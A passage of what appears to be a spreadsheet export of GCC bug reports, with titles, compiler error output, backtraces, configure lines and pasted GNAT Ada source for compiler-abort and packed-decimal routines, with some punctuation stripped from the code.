Simple_homogeneous.cpp:30:7: error: 'LineC3::base' has incomplete type
/tmp/gcc/inst/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/../../../../include/c++/4.7.0/bits/stl_pair.h:88:12: error: declaration of 'LineC3::Rep'</t>
  </si>
  <si>
    <t>GCC-60156</t>
  </si>
  <si>
    <t>GCC doesn't warn about variadic main</t>
  </si>
  <si>
    <t>E.g. on
int main (int argc char *argv[] ...) { }
with -Wpedantic.</t>
  </si>
  <si>
    <t>GCC-12441</t>
  </si>
  <si>
    <t>[3.3 Regression] Can't spill register bug</t>
  </si>
  <si>
    <t>andreas@meo-dipt:~/gd/build/common/format$ gcc --version
gcc (GCC) 3.3.2 20030908 (Debian prerelease)
Copyright (C) 2003 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
andreas@meo-dipt:~/gd/build/common/format$ gcc -O2 -c gcc-bug.c
gcc-bug.c: In function `formatZformatZbuf_format_integer_METH_INT_next_digit':
gcc-bug.c:148: error: unable to find a register to spill in class `Q_REGS'
gcc-bug.c:148: error: this is the insn:
(insn:HI 381 379 388 12 0x4001a790 (set (mem:QI (plus:SI (plus:SI (subreg:SI
(reg/v:DI 88) 4)
                    (subreg:SI (reg/v:DI 89) 0))
                (const_int 16 [0x10])) [0 S1 A8])
        (subreg:QI (reg/v:SI 4 esi [84]) 0)) 47 {*movqi_1} (nil)
    (expr_list:REG_DEAD (reg/v:DI 89)
        (expr_list:REG_DEAD (reg/v:DI 88)
            (expr_list:REG_DEAD (reg/v:SI 4 esi [84])
                (nil)))))
gcc-bug.c:148: confused by earlier errors bailing out
The file in question can be found at http://www.gwydiondylan.org/~andreas/gcc-bug.c</t>
  </si>
  <si>
    <t>GCC-53111</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] Derived types cannot be USE-associated again with -std=f95</t>
  </si>
  <si>
    <t>Created attachment 27234
Test file which fails to compile with -std=f95
When you have a derived type defined in a module (A) which is used in another module (B) and the program itself which also uses module(B) the compiler gives an error with '-std=f95' option (gfortran -std=f95 -o test test.f95): 
Error: Fortran 2003: Generic name 'my' of function 'my' at (1) being the same name as derived type at (2)
See attached file for an example. Some extensive searching on the web and Modern Fortran explained does not give reason to believe that this is the way it is supposed to behave when adhering to the Fortran 95 standard.
Output of 'gcc -v':
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/src/gcc-4.7-20120414/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --enable-libstdcxx-time --enable-gnu-unique-object --enable-linker-build-id --with-ppl --enable-cloog-backend=isl --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --with-linker-hash-style=gnu --disable-multilib --disable-libssp --disable-build-with-cxx --disable-build-poststage1-with-cxx --enable-checking=release
Thread model: posix
gcc version 4.7.0 20120414 (prerelease) (GCC)</t>
  </si>
  <si>
    <t>marienberg</t>
  </si>
  <si>
    <t>GCC-42721</t>
  </si>
  <si>
    <t>possible integer wrong code bug</t>
  </si>
  <si>
    <t>Seen on Ubuntu 9.10.  I think 1 is the right answer.
regehr@john-home:~/volatile/bugs/tmp254$ current-gcc -O1 small.c -o small
regehr@john-home:~/volatile/bugs/tmp254$ ./small
checksum = 1
regehr@john-home:~/volatile/bugs/tmp254$ current-gcc -O2 small.c -o small
regehr@john-home:~/volatile/bugs/tmp254$ ./small
checksum = 0
regehr@john-home:~/volatile/bugs/tmp254$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/tmp/gcc-r155838-install/libexec/gcc/i686-pc-linux-gnu/4.5.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/tmp/gcc-r155838-install --program-prefix=r155838- --enable-languages=cc++
Thread model: posix
gcc version 4.5.0 20100112 (experimental) (GCC) 
regehr@john-home:~/volatile/bugs/tmp254$ cat small.c
#include 
#include 
static uint64_t safe_div_uint64_t (uint64_t ui1 uint64_t ui2)
{
  return (ui2 == 0) ? ui1 : (ui1 / ui2)
}
static int8_t safe_mod_int8_t (int8_t si1 int8_t si2)
{
  return 
    ((si2 == 0) || ((si1 == INT8_MIN) &amp;&amp; (si2 == (-1)))) ? 
    si1 : 
    (si1 % si2)
}
static int32_t g_5
static int32_t g_11
int main (void)
{
  uint64_t l_7 = 0x509CB0BEFCDF11BBLL
  g_11 ^= l_7 
  printf (checksum = %d\n g_11)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-21923</t>
  </si>
  <si>
    <t>[4.1 Regression] Ada compiler fails to build on gcc 4.1</t>
  </si>
  <si>
    <t>../../xgcc -B../../  -c -g -O2 -fPIC      -W -Wall -gnatpg  i-pacdec.adb -o
i-pacdec.o
+===========================GNAT BUG DETECTED==============================+
| 4.1.0 20050604 (experimental) (i686-pc-linux-gnu) GCC error:             |
| in simplify_cond_and_lookup_avail_expr at tree-ssa-dom.c:2171           |
| Error detected at i-pacdec.adb:352:1                                     |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
raised TYPES.UNRECOVERABLE_ERROR : comperr.adb:381
make[6]: *** [i-pacdec.o] Error 1
make[6]: Leaving directory `/root/gccit/gcc/ada/rts'
make[5]: *** [gnatlib] Error 2
make[5]: Leaving directory `/root/gccit/gcc/ada'
make[4]: *** [gnatlib-shared-default] Error 2
make[4]: Leaving directory `/root/gccit/gcc/ada'
make[3]: *** [gnatlib-shared-dual] Error 2
make[3]: Leaving directory `/root/gccit/gcc/ada'
make[2]: *** [gnatlib-shared] Error 2
make[2]: Leaving directory `/root/gccit/gcc/ada'
make[1]: *** [gnatlib-shared] Error 2
make[1]: Leaving directory `/root/gccit/i686-pc-linux-gnu/libada'
make: *** [all-target-libada] Error 2
Here is how I configured &amp; built:
../gcc/configure --enable-languages=cc++adaf95objcjava --disable-checking
--enable-threads=posix
  130  make
gcc -v
Reading specs from /usr/gnat/lib/gcc-lib/i686-pc-linux-gnu/3.2.3/specs
Configured with:
/bonn.a/gnatmail-5/release-5/build-bonn/../build-bonn/src/configure
--prefix=/usr/gnat --enable-languages=cc++ada --enable-threads=posix
--disable-nls --disable-checking
Thread model: posix
gcc version 3.2.3
Here are the sources I think you want:
------------------------------------------------------------------------------
--                                                                          --
--                         GNAT COMPILER COMPONENTS                         --
--                                                                          --
--                              C O M P E R R                               --
--                                                                          --
--                                 B o d y                                  --
--                                                                          --
--          Copyright (C) 1992-2005 Free Software Foundation Inc.          --
--                                                                          --
-- GNAT is free software  you can  redistribute it  and/or modify it under --
-- terms of the  GNU General Public License as published  by the Free Soft- --
-- ware  Foundation  either version 2  or (at your option) any later ver- --
-- sion.  GNAT is distributed in the hope that it will be useful but WITH- --
-- OUT ANY WARRANTY  without even the  implied warranty of MERCHANTABILITY --
-- or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License --
-- for  more details.  You should have  received  a copy of the GNU General --
-- Public License  distributed with GNAT  see file COPYING.  If not write --
-- to  the Free Software Foundation  59 Temple Place - Suite 330  Boston --
-- MA 02111-1307 USA.                                                      --
--                                                                          --
-- GNAT was originally developed  by the GNAT team at  New York University. --
-- Extensive contributions were provided by AdaCore.                         --
--                                                                          --
------------------------------------------------------------------------------
--  This package contains routines called when a fatal internal compiler
--  error is detected. Calls to these routines cause termination of the
--  current compilation with appropriate error output.
with Atree    use Atree
with Debug    use Debug
with Errout   use Errout
with Fname    use Fname
with Gnatvsn  use Gnatvsn
with Lib      use Lib
with Namet    use Namet
with Osint    use Osint
with Output   use Output
with Sinput   use Sinput
with Sprint   use Sprint
with Sdefault use Sdefault
with Treepr   use Treepr
with Types    use Types
with Ada.Exceptions use Ada.Exceptions
with System.Soft_Links use System.Soft_Links
package body Comperr is
   ----------------
   -- Local Data --
   ----------------
   Abort_In_Progress : Boolean := False
   --  Used to prevent runaway recursion if something segfaults
   --  while processing a previous abort.
   -----------------------
   -- Local Subprograms --
   -----------------------
   procedure Repeat_Char (Char : Character Col : Nat After : Character)
   --  Output Char until current column is at or past Col and then output
   --  the character given by After (if column is already past Col on entry
   --  then the effect is simply to output the After character).
   --------------------
   -- Compiler_Abort --
   --------------------
   procedure Compiler_Abort
     (X    : String
      Code : Integer := 0)
   is
      --  The procedures below output a bug box with information about
      --  the cause of the compiler abort and about the preferred method
      --  of reporting bugs. The default is a bug box appropriate for
      --  the FSF version of GNAT but there are specializations for
      --  the GNATPRO and Public releases by AdaCore.
      procedure End_Line
      --  Add blanks up to column 76 and then a final vertical bar
      --------------
      -- End_Line --
      --------------
      procedure End_Line is
      begin
         Repeat_Char (' ' 76 '|')
         Write_Eol
      end End_Line
      Is_Public_Version : constant Boolean := Get_Gnat_Build_Type = Public
      Is_FSF_Version    : constant Boolean := Get_Gnat_Build_Type = FSF
   --  Start of processing for Compiler_Abort
   begin
      --  Prevent recursion through Compiler_Abort e.g. via SIGSEGV.
      if Abort_In_Progress then
         Exit_Program (E_Abort)
      end if
      Abort_In_Progress := True
      --  If any errors have already occurred then we guess that the abort
      --  may well be caused by previous errors and we don't make too much
      --  fuss about it since we want to let programmer fix the errors first.
      --  Debug flag K disables this behavior (useful for debugging)
      if Serious_Errors_Detected /= 0 and then not Debug_Flag_K then
         Errout.Finalize
         Set_Standard_Error
         Write_Str (compilation abandoned due to previous error)
         Write_Eol
         Set_Standard_Output
         Source_Dump
         Tree_Dump
         Exit_Program (E_Errors)
      --  Otherwise give message with details of the abort
      else
         Set_Standard_Error
         --  Generate header for bug box
         Write_Char ('+')
         Repeat_Char ('=' 29 'G')
         Write_Str (NAT BUG DETECTED)
         Repeat_Char ('=' 76 '+')
         Write_Eol
         --  Output GNAT version identification
         Write_Str (| )
         Write_Str (Gnat_Version_String)
         Write_Str ( ()
         --  Output target name deleting junk final reverse slash
         if Target_Name.all (Target_Name.all'Last) = '\'
           or else Target_Name.all (Target_Name.all'Last) = '/'
         then
            Write_Str (Target_Name.all (1 .. Target_Name.all'Last - 1))
         else
            Write_Str (Target_Name.all)
         end if
         --  Output identification of error
         Write_Str () )
         if X'Length + Column &gt; 76 then
            if Code &lt; 0 then
               Write_Str (GCC error:)
            end if
            End_Line
            Write_Str (| )
         end if
         if X'Length &gt; 70 then
            declare
               Last_Blank : Integer := 70
            begin
               for P in 40 .. 69 loop
                  if X (P) = ' ' then
                     Last_Blank := P
                  end if
               end loop
               Write_Str (X (1 .. Last_Blank))
               End_Line
               Write_Str (|    )
               Write_Str (X (Last_Blank + 1 .. X'Length))
            end
         else
            Write_Str (X)
         end if
         if Code &gt; 0 then
            Write_Str ( Code=)
            Write_Int (Int (Code))
         elsif Code = 0 then
            --  For exception case get exception message from the TSD. Note
            --  that it would be neater and cleaner to pass the exception
            --  message (obtained from Exception_Message) as a parameter to
            --  Compiler_Abort but we can't do this quite yet since it would
            --  cause bootstrap path problems for 3.10 to 3.11.
            Write_Char (' ')
            Write_Str (Exception_Message (Get_Current_Excep.all.all))
         end if
         End_Line
         --  Output source location information
         if Sloc (Current_Error_Node) &lt;= Standard_Location
           or else Sloc (Current_Error_Node) = No_Location
         then
            Write_Str (| No source file position information available)
            End_Line
         else
            Write_Str (| Error detected at )
            Write_Location (Sloc (Current_Error_Node))
            End_Line
         end if
         --  There are two cases now. If the file gnat_bug.box exists
         --  we use the contents of this file at this point.
         declare
            Lo  : Source_Ptr
            Hi  : Source_Ptr
            Src : Source_Buffer_Ptr
         begin
            Namet.Unlock
            Name_Buffer (1 .. 12) := gnat_bug.box
            Name_Len := 12
            Read_Source_File (Name_Enter 0 Hi Src)
            --  If we get a Src file we use it
            if Src /= null then
               Lo := 0
               Outer : while Lo &lt; Hi loop
                  Write_Str (| )
                  Inner : loop
                     exit Inner when Src (Lo) = ASCII.CR
                       or else Src (Lo) = ASCII.LF
                     Write_Char (Src (Lo))
                     Lo := Lo + 1
                  end loop Inner
                  End_Line
                  while Lo &lt;= Hi
                    and then (Src (Lo) = ASCII.CR
                                or else Src (Lo) = ASCII.LF)
                  loop
                     Lo := Lo + 1
                  end loop
               end loop Outer
            --  Otherwise we use the standard fixed text
            else
               if Is_FSF_Version then
                  Write_Str
                    (| Please submit a bug report see &amp;
                      http://gcc.gnu.org/bugs.html.)
                  End_Line
               elsif Is_Public_Version then
                  Write_Str
                    (| submit bug report by email  &amp;
                     to report@adacore.com.)
                  End_Line
                  Write_Str
                    (| See gnatinfo.txt for full info on procedure  &amp;
                     for submitting bugs.)
                  End_Line
               else
                  Write_Str
                    (| Please submit a bug report using GNAT Tracker:)
                  End_Line
                  Write_Str
                    (| http://www.adacore.com/gnattracker/  &amp;
                     section 'send a report'.)
                  End_Line
                  Write_Str
                    (| alternatively submit a bug report by email  &amp;
                     to report@adacore.com.)
                  End_Line
               end if
               Write_Str
                 (| Use a subject line meaningful to you &amp;
                   and us to track the bug.)
               End_Line
               if not (Is_Public_Version or Is_FSF_Version) then
                  Write_Str
                    (| Include your customer number #nnn  &amp;
                     in the subject line.)
                  End_Line
               end if
               Write_Str
                 (| Include the entire contents of this bug  &amp;
                  box in the report.)
               End_Line
               Write_Str
                 (| Include the exact gcc or gnatmake command  &amp;
                  that you entered.)
               End_Line
               Write_Str
                 (| Also include sources listed below in gnatchop format)
               End_Line
               Write_Str
                 (| (concatenated together with no headers between files).)
               End_Line
               if not Is_FSF_Version then
                  Write_Str
                    (| Use plain ASCII or MIME attachment.)
                  End_Line
               end if
            end if
         end
         --  Complete output of bug box
         Write_Char ('+')
         Repeat_Char ('=' 76 '+')
         Write_Eol
         if Debug_Flag_3 then
            Write_Eol
            Write_Eol
            Print_Tree_Node (Current_Error_Node)
            Write_Eol
         end if
         Write_Eol
         Write_Line (Please include these source files with error report)
         Write_Line (Note that list may not be accurate in some cases )
         Write_Line (so please double check that the problem can still )
         Write_Line (be reproduced with the set of files listed.)
         Write_Eol
         for U in Main_Unit .. Last_Unit loop
            begin
               if not Is_Internal_File_Name
                        (File_Name (Source_Index (U)))
               then
                  Write_Name (Full_File_Name (Source_Index (U)))
                  Write_Eol
               end if
            --  No point in double bug box if we blow up trying to print
            --  the list of file names! Output informative msg and quit.
            exception
               when others =&gt;
                  Write_Str (list may be incomplete)
                  exit
            end
         end loop
         Write_Eol
         Set_Standard_Output
         Tree_Dump
         Source_Dump
         raise Unrecoverable_Error
      end if
   end Compiler_Abort
   -----------------
   -- Repeat_Char --
   -----------------
   procedure Repeat_Char (Char : Character Col : Nat After : Character) is
   begin
      while Column &lt; Col loop
         Write_Char (Char)
      end loop
      Write_Char (After)
   end Repeat_Char
end Comperr
------------------------------------------------------------------------------
--                                                                          --
--                         GNAT COMPILER COMPONENTS                         --
--                                                                          --
--            I N T E R F A C E S . P A C K E D _ D E C I M A L             --
--                                                                          --
--                                 B o d y                                  --
--            (Version for IBM Mainframe Packed Decimal Format)             --
--                                                                          --
--          Copyright (C) 1992-2001 Free Software Foundation Inc.         --
--                                                                          --
-- GNAT is free software  you can  redistribute it  and/or modify it under --
-- terms of the  GNU General Public License as published  by the Free Soft- --
-- ware  Foundation  either version 2  or (at your option) any later ver- --
-- sion.  GNAT is distributed in the hope that it will be useful but WITH- --
-- OUT ANY WARRANTY  without even the  implied warranty of MERCHANTABILITY --
-- or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License --
-- for  more details.  You should have  received  a copy of the GNU General --
-- Public License  distributed with GNAT  see file COPYING.  If not write --
-- to  the Free Software Foundation  59 Temple Place - Suite 330  Boston --
-- MA 02111-1307 USA.                                                      --
--                                                                          --
-- As a special exception  if other files  instantiate  generics from this --
-- unit or you link  this unit with other files  to produce an executable --
-- this  unit  does not  by itself cause  the resulting  executable  to  be --
-- covered  by the  GNU  General  Public  License.  This exception does not --
-- however invalidate  any other reasons why  the executable file  might be --
-- covered by the  GNU Public License.                                      --
--                                                                          --
-- GNAT was originally developed  by the GNAT team at  New York University. --
-- Extensive contributions were provided by Ada Core Technologies Inc.      --
--                                                                          --
------------------------------------------------------------------------------
with System                  use System
with Unchecked_Conversion
package body Interfaces.Packed_Decimal is
   type Packed is array (Byte_Length) of Unsigned_8
   --  The type used internally to represent packed decimal
   type Packed_Ptr is access Packed
   function To_Packed_Ptr is new Unchecked_Conversion (Address Packed_Ptr)
   --  The following array is used to convert a value in the range 0-99 to
   --  a packed decimal format with two hexadecimal nibbles. It is worth
   --  using table look up in this direction because divides are expensive.
   Packed_Byte : constant array (00 .. 99) of Unsigned_8 :=
      (16#00# 16#01# 16#02# 16#03# 16#04#
       16#05# 16#06# 16#07# 16#08# 16#09#
       16#10# 16#11# 16#12# 16#13# 16#14#
       16#15# 16#16# 16#17# 16#18# 16#19#
       16#20# 16#21# 16#22# 16#23# 16#24#
       16#25# 16#26# 16#27# 16#28# 16#29#
       16#30# 16#31# 16#32# 16#33# 16#34#
       16#35# 16#36# 16#37# 16#38# 16#39#
       16#40# 16#41# 16#42# 16#43# 16#44#
       16#45# 16#46# 16#47# 16#48# 16#49#
       16#50# 16#51# 16#52# 16#53# 16#54#
       16#55# 16#56# 16#57# 16#58# 16#59#
       16#60# 16#61# 16#62# 16#63# 16#64#
       16#65# 16#66# 16#67# 16#68# 16#69#
       16#70# 16#71# 16#72# 16#73# 16#74#
       16#75# 16#76# 16#77# 16#78# 16#79#
       16#80# 16#81# 16#82# 16#83# 16#84#
       16#85# 16#86# 16#87# 16#88# 16#89#
       16#90# 16#91# 16#92# 16#93# 16#94#
       16#95# 16#96# 16#97# 16#98# 16#99#)
   ---------------------
   -- Int32_To_Packed --
   ---------------------
   procedure Int32_To_Packed (V : Integer_32 P : System.Address D : D32) is
      PP           : constant Packed_Ptr  := To_Packed_Ptr (P)
      Empty_Nibble : constant Boolean     := ((D rem 2) = 0)
      B            : constant Byte_Length := (D / 2) + 1
      VV           : Integer_32 := V
   begin
      --  Deal with sign byte first
      if VV &gt;= 0 then
         PP (B) := Unsigned_8 (VV rem 10) * 16 + 16#C#
         VV := VV / 10
      else
         VV := -VV
         PP (B) := Unsigned_8 (VV rem 10) * 16 + 16#D#
      end if
      for J in reverse B - 1 .. 2 loop
         if VV = 0 then
            for K in 1 .. J loop
               PP (K) := 16#00#
            end loop
            return
         else
            PP (J) := Packed_Byte (Integer (VV rem 100))
            VV := VV / 100
         end if
      end loop
      --  Deal with leading byte
      if Empty_Nibble then
         if VV &gt; 9 then
            raise Constraint_Error
         else
            PP (1) := Unsigned_8 (VV)
         end if
      else
         if VV &gt; 99 then
            raise Constraint_Error
         else
            PP (1) := Packed_Byte (Integer (VV))
         end if
      end if
   end Int32_To_Packed
   ---------------------
   -- Int64_To_Packed --
   ---------------------
   procedure Int64_To_Packed (V : Integer_64 P : System.Address D : D64) is
      PP           : constant Packed_Ptr  := To_Packed_Ptr (P)
      Empty_Nibble : constant Boolean     := ((D rem 2) = 0)
      B            : constant Byte_Length := (D / 2) + 1
      VV           : Integer_64 := V
   begin
      --  Deal with sign byte first
      if VV &gt;= 0 then
         PP (B) := Unsigned_8 (VV rem 10) * 16 + 16#C#
         VV := VV / 10
      else
         VV := -VV
         PP (B) := Unsigned_8 (VV rem 10) * 16 + 16#D#
      end if
      for J in reverse B - 1 .. 2 loop
         if VV = 0 then
            for K in 1 .. J loop
               PP (K) := 16#00#
            end loop
            return
         else
            PP (J) := Packed_Byte (Integer (VV rem 100))
            VV := VV / 100
         end if
      end loop
      --  Deal with leading byte
      if Empty_Nibble then
         if VV &gt; 9 then
            raise Constraint_Error
         else
            PP (1) := Unsigned_8 (VV)
         end if
      else
         if VV &gt; 99 then
            raise Constraint_Error
         else
            PP (1) := Packed_Byte (Integer (VV))
         end if
      end if
   end Int64_To_Packed
   ---------------------
   -- Packed_To_Int32 --
   ---------------------
   function Packed_To_Int32 (P : System.Address D : D32) return Integer_32 is
      PP           : constant Packed_Ptr  := To_Packed_Ptr (P)
      Empty_Nibble : constant Boolean     := ((D mod 2) = 0)
      B            : constant Byte_Length := (D / 2) + 1
      V            : Integer_32
      Dig          : Unsigned_8
      Sign         : Unsigned_8
      J            : Positive
   begin
      --  Cases where there is an unused (zero) nibble in the first byte.
      --  Deal with the single digit nibble at the right of this byte
      if Empty_Nibble then
         V := Integer_32 (PP (1))
         J := 2
         if V &gt; 9 then
            raise Constraint_Error
         end if
      --  Cases where all nibbles are used
      else
         V := 0
         J := 1
      end if
      --  Loop to process bytes containing two digit nibbles
      while J &lt; B loop
         Dig := Shift_Right (PP (J) 4)
         if Dig &gt; 9 then
            raise Constraint_Error
         else
            V := V * 10 + Integer_32 (Dig)
         end if
         Dig := PP (J) and 16#0F#
         if Dig &gt; 9 then
            raise Constraint_Error
         else
            V := V * 10 + Integer_32 (Dig)
         end if
         J := J + 1
      end loop
      --  Deal with digit nibble in sign byte
      Dig := Shift_Right (PP (J) 4)
      if Dig &gt; 9 then
         raise Constraint_Error
      else
         V := V * 10 + Integer_32 (Dig)
      end if
      Sign :=  PP (J) and 16#0F#
      --  Process sign nibble (deal with most common cases first)
      if Sign = 16#C# then
         return V
      elsif Sign = 16#D# then
         return -V
      elsif Sign = 16#B# then
         return -V
      elsif Sign &gt;= 16#A# then
         return V
      else
         raise Constraint_Error
      end if
   end Packed_To_Int32
   ---------------------
   -- Packed_To_Int64 --
   ---------------------
   function Packed_To_Int64 (P : System.Address D : D64) return Integer_64 is
      PP           : constant Packed_Ptr  := To_Packed_Ptr (P)
      Empty_Nibble : constant Boolean     := ((D mod 2) = 0)
      B            : constant Byte_Length := (D / 2) + 1
      V            : Integer_64
      Dig          : Unsigned_8
      Sign         : Unsigned_8
      J            : Positive
   begin
      --  Cases where there is an unused (zero) nibble in the first byte.
      --  Deal with the single digit nibble at the right of this byte
      if Empty_Nibble then
         V := Integer_64 (PP (1))
         J := 2
         if V &gt; 9 then
            raise Constraint_Error
         end if
      --  Cases where all nibbles are used
      else
         J := 1
         V := 0
      end if
      --  Loop to process bytes containing two digit nibbles
      while J &lt; B loop
         Dig := Shift_Right (PP (J) 4)
         if Dig &gt; 9 then
            raise Constraint_Error
         else
            V := V * 10 + Integer_64 (Dig)
         end if
         Dig := PP (J) and 16#0F#
         if Dig &gt; 9 then
            raise Constraint_Error
         else
            V := V * 10 + Integer_64 (Dig)
         end if
         J := J + 1
      end loop
      --  Deal with digit nibble in sign byte
      Dig := Shift_Right (PP (J) 4)
      if Dig &gt; 9 then
         raise Constraint_Error
      else
         V := V * 10 + Integer_64 (Dig)
      end if
      Sign :=  PP (J) and 16#0F#
      --  Process sign nibble (deal with most common cases first)
      if Sign = 16#C# then
         return V
      elsif Sign = 16#D# then
         return -V
      elsif Sign = 16#B# then
         return -V
      elsif Sign &gt;= 16#A# then
         return V
      else
         raise Constraint_Error
      end if
   end Packed_To_Int64
end Interfaces.Packed_Decimal</t>
  </si>
  <si>
    <t>rblove</t>
  </si>
  <si>
    <t>GCC-9708</t>
  </si>
  <si>
    <t>Unifies non-constant</t>
  </si>
  <si>
    <t>Compiler core dumps on attached code.  I originally
encountered the problem with 3.1 after upgrading to
3.2.2 it is still present.
Compiler output:
054@~/tmp/gcc3 (27): g++3 -v -c bug.cc
Reading specs from /home/team02/jakan/gnu/lib/gcc-lib/sparc-sun-solaris2.8/3.2.2/specs
Configured with: ../gcc-3.2.2/configure --prefix=/home/team02/jakan/gnu --program-suffix=3 --enable-threads=posix
Thread model: posix
gcc version 3.2.2
 /home/team02/jakan/gnu/lib/gcc-lib/sparc-sun-solaris2.8/3.2.2/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=2 -D__GXX_ABI_VERSION=102 -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -D__sparc -D__sun -D__unix -Asystem=unix -Asystem=svr4 -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_XOPEN_SOURCE=500 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -D__EXTENSIONS__ -D__SIZE_TYPE__=unsigned int -D__PTRDIFF_TYPE__=int -D__WCHAR_TYPE__=long int -D__WINT_TYPE__=long int -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc bug.cc -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -quiet -dumpbase bug.cc -version -o /var/tmp//ccWEtpTr.s
GNU CPP version 3.2.2 (cpplib) (sparc ELF)
GNU C++ version 3.2.2 (sparc-sun-solaris2.8)
	compiled by GNU C version 3.2.2.
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /home/team02/jakan/gnu/sparc-sun-solaris2.8/include
#include ... search starts here:
#include  search starts here:
 /home/team02/jakan/gnu/include/c++/3.2.2
 /home/team02/jakan/gnu/include/c++/3.2.2/sparc-sun-solaris2.8
 /home/team02/jakan/gnu/include/c++/3.2.2/backward
 /home/team02/jakan/gnu/include
 /home/team02/jakan/gnu/lib/gcc-lib/sparc-sun-solaris2.8/3.2.2/include
 /usr/include
End of search list.
bug.cc: In function `int f()':
bug.cc:78: internal error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc-3.2.2
Environment:
Solaris 2.8 on Sparc Ultra 5-10
054@~/tmp/gcc3 (24): uname -a
SunOS padev054 5.8 Generic_108528-13 sun4u sparc SUNWUltra-5_10
How-To-Repeat:
Just recompile.</t>
  </si>
  <si>
    <t>GCC-51236</t>
  </si>
  <si>
    <t>ICE: in copy_to_mode_reg at explow.c:641 with -O -ftree-vectorize -mavx2</t>
  </si>
  <si>
    <t>Created attachment 25866
reduced testcase
Compiler output:
$ gcc -O -ftree-vectorize -mavx2 testcase.c 
testcase.c: In function 'foo':
testcase.c:5:11: internal compiler error: in copy_to_mode_reg at explow.c:641
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  internal_error (gmsgid=0x14c64a0 in %s at %s:%d) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:839
#1  0x00000000011c4674 in fancy_abort (file=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:899
#2  0x00000000007324ec in copy_to_mode_reg (mode=V4DFmode x=0x7ffff5583c30) at /mnt/svn/gcc-trunk/gcc/explow.c:641
#3  0x0000000000c4dc2e in ix86_expand_builtin (exp=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:29982
#4  0x000000000063c070 in expand_builtin (exp=0x7ffff56e53c0 target=0x7ffff577b260 subtarget=0x0 mode=V4DImode ignore=0)
    at /mnt/svn/gcc-trunk/gcc/builtins.c:5803
#5  0x000000000074a94e in expand_expr_real_1 (exp=0x7ffff56e53c0 target=0x7ffff577b260 tmode=V4DImode modifier=EXPAND_NORMAL 
    alt_rtl=0x7fffffffd458) at /mnt/svn/gcc-trunk/gcc/expr.c:9915
#6  0x000000000074ff64 in expand_expr_real (exp=0x7ffff56e53c0 target=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/expr.c:7733
#7  0x0000000000759cac in store_expr (exp=0x7ffff56e53c0 target=0x7ffff577b260 call_param_p=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/expr.c:5163
#8  0x00000000007601bd in expand_assignment (to=0x7ffff5771730 from=0x7ffff56e53c0 nontemporal=false) at /mnt/svn/gcc-trunk/gcc/expr.c:4948
#9  0x000000000066a405 in expand_call_stmt (stmt=0x7ffff576f498) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2075
#10 expand_gimple_stmt_1 (stmt=0x7ffff576f498) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2116
#11 expand_gimple_stmt (stmt=0x7ffff576f498) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2268
#12 0x000000000066bf71 in expand_gimple_basic_block (bb=0x7ffff56dc208) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:4015
#13 0x000000000066e026 in gimple_expand_cfg () at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:4523
#14 0x00000000008df685 in execute_one_pass (pass=0x17cb200) at /mnt/svn/gcc-trunk/gcc/passes.c:2074
#15 0x00000000008dfa25 in execute_pass_list (pass=0x17cb200) at /mnt/svn/gcc-trunk/gcc/passes.c:2129
#16 0x0000000000a4169e in tree_rest_of_compilation (fndecl=0x7ffff56de800) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:420
#17 0x0000000000694d1a in cgraph_expand_function (node=0x7ffff55886c0) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1819
#18 0x0000000000696abc in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1886
#19 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2199
